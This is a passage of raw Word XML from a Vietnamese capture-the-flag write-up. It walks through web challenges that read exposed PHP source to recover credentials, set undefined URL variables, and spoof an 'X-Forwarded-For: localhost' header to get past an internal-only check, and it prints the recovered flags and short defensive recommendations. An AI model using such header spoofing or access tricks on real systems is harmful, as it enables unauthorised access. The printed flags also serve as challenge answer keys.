          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/?source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> được truy cập bởi bất kì người dùng nào và thế là chúng ta đi tiến hành xem url+/?source (hình 20)</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251678720" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6E12A9B9" wp14:editId="5D0609BA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>565785</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="3086100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="3086100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F210E72"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t>Figure 20: Hình ảnh nội dung file source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5233EAE1"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Hình 20 cho ta thấy nội dung file là 1 đoạn code viết bằng php nhằm kiểm tra user và pass, dựa vào đó chúng ta sẽ tiến hành decode user và pass ta được </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>user=Cyber-Talent</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>pass=Cyber-Talent</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. Sau khi có được user và pass, ta tiến hành login </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2CC68DCF"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21: Hình ảnh trang web sau khi login</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251679744" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4BB01796" wp14:editId="3D85A85D">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>127081</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1790700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1790700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="583B1065"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sau khi login trang web, ta thấy được đoạn tin nhắn được mã hóa bằng morse, tiếp tục ta truy cập vào trang web </w:t>
      </w:r>
      <w:hyperlink r:id="rId59">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://morsedecoder.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> để decode nó và nhận được flag (xem hình 22)</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4B98CD94" wp14:editId="40137FC8">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15239</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>750570</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1866900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="2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0"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1866900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF0D67E"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t>Figure 22: Hình ảnh flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E619DE0"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Flag: FLAG(I-KN0W-Y0U-AR3-M0RS3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F28F30"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Khuyến cáo: Thực hiện lọc đầu vào gói tin và mã hoá tốt hơn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416C052C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_heading=h.8vkkzwl00l01" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Kịch bản Cheers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F2F91" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Cheers - data, information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A0AB90" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện truyền các payload trên url để vào flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E27DA5"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72FADD9C" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Vào trang web và lấy flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D148C21" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với challenge này ta nhận thấy rằng challenge nói về việc code phát sinh lỗi chưa định giá trị cho biến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38509B8A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="076BD6E7" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F200042" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19B6C17D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1329A644"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lastRenderedPageBreak/>
        <w:t>Figure 23: Hình ảnh khi vào web</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251681792" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="4719ED67" wp14:editId="48B568C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-104774</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>180975</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1625600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1625600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FDC279D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Với hình ảnh trên, ta nhận thấy rằng biến welcome chưa được định giá trị và ta tiến hành định giá trị cho nó như hình 24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE8929D" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="244D9669"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t>Figure 24: Hình ảnh khi hoàn thành việc định giá trị cho biến welcome</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251682816" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="72816465" wp14:editId="68F5692E">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-149224</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>123825</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="977900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="977900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FF9E8" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Sau khi hoàn thành việc định giá trị cho biến welcome, ta thấy rằng trang web lại xuất hiện thông báo chưa định giá trị cho biến gimme_flag. Ta tiến hành thao tác tương tự và nhận được flag như hình </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="61732939" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="29D0F888" wp14:editId="50DB45AF">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-146049</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>184150</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1130300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1130300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0157C9"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t>Figure 25: Hình ảnh flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409178F6"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FLAG{k33p_c4lm_st4rt_c0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>d!ng</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DA3F06"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Khuyến cáo: Chặn các đầu vào trên url không hợp lệ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB091DB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00CD6539">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D8861A" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_heading=h.tb9ub51vpykl" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="31"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">      Kịch bản Got Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="279D83EA" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Got Controls - data, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>information</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="60DA7422" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Thực hiện thay đổi thông tin trên gói tin để thực hiện truy cập đến những nơi có thông tin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A62B2C"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7CD30342" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Bước 1: Truy cập liên kết và lấy flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630F7BB" w14:textId="77777777" w:rsidR="00CD6539" w:rsidRPr="007913DC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Tiến hành vào link </w:t>
      </w:r>
      <w:hyperlink r:id="rId64">
        <w:r w:rsidRPr="007913DC">
          <w:rPr>
            <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://18.195.173.237:4444/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và ta thấy thông tin trang web như sau</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9CAB68"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26: Hình ảnh khi vào trang web</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251684864" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="070D20F8" wp14:editId="1DB68E22">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>50801</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1270000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="186892E5"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Sau khi vào trang web, ta thấy rằng website này chỉ được phép truy cập nội bộ, ngay lập tức nghĩ đến việc cần thêm </w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>X-Forwarded-For: localhost</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> và gói tin request để thử giả mạo gói tin trong mạng nội bộ và rất may mắn rằng cách này hiệu quả và chúng em nhận được flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED8140F"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27: Hình ảnh khi thêm X-Forwarded-For: localhost vào gói request</w:t>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="7F775F20" wp14:editId="21895858">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>50801</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>187325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1270000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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6114105" cy="1270000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251686912" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="2D0EFC6A" wp14:editId="32F63D2F">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-15874</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>227298</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="1473200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="19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6"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114105" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007913DC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Sach Viet" w:hAnsi="UTM Sach Viet"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="114300" distB="114300" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="2B960346" wp14:editId="35086E0B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-19049</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2266299</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6114105" cy="914400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom distT="114300" distB="114300"/>
            <wp:docPr id="1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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
